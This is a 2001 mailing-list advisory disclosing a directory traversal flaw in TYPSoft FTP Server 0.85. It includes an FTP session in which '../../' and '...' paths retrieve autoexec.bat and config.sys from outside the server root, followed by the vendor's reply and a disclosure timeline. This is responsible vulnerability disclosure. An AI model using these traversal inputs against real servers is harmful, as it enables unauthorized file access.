From: joetestaHUSHMAIL.COM
Date: Wed Feb 28 2001 - 17:27:57 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerability in TYPSoft FTP Server


    TYPSoft FTP Server v0.85 is an ftp server available from
    http://www.webmasterfree.com and http://typsoft.n3.net. A vulnerability
    exists which allows a remote attacker to break out of the ftp root using
    relative paths (ie: '...').


    The following is an illustration of the problem:

    % ftp localhost
    Connected to xxxxxxxxxx.rh.rit.edu.
    220 TYPSoft FTP Server 0.85 ready...
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog.
    230 User jdog logged in.
    ftp> pwd
    257 "/C:/directory/directory/" is current directory.
    ftp> get ../../autoexec.bat
    200 Port command successful.
    150 Opening data connection for ../../autoexec.bat.
    226 Transfer complete.
    ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
    ftp> cd ..
    501 CWD failed. No permission
    ftp> cd ...
    250 CWD command successful. "/C:/directory/directory/.../" is current directory.
    ftp> pwd
    257 "/C:/directory/directory/.../" is current directory.
    ftp> get config.sys
    200 Port command successful.
    150 Opening data connection for config.sys.
    226 Transfer complete.
    ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.


    > Date: Sat, 24 Feb 2001 01:39:23 -0500
    > Subject: Re: Vulnerability in TYPSoft FTP Server
    > From: TYPSoft <typsoftaltern.org>
    > To: joetestahushmail.com
    > Hi
    > I have try to fix this problem.
    > I test I have made seem to be OK.
    > Thanks for the report
    > Marc
    > TYPSoft

        Unfortunately, I do not have the resources to verify this fix at
    this time. Thus, I urge users to proceed with caution.

        Vendor Status

    TYPSoft was contacted via <typsoftaltern.org> on Wednesday, February
    21, 2001.

        - Joe Testa ( e-mail: joetestahushmail.com / AIM: LordSpankatron )

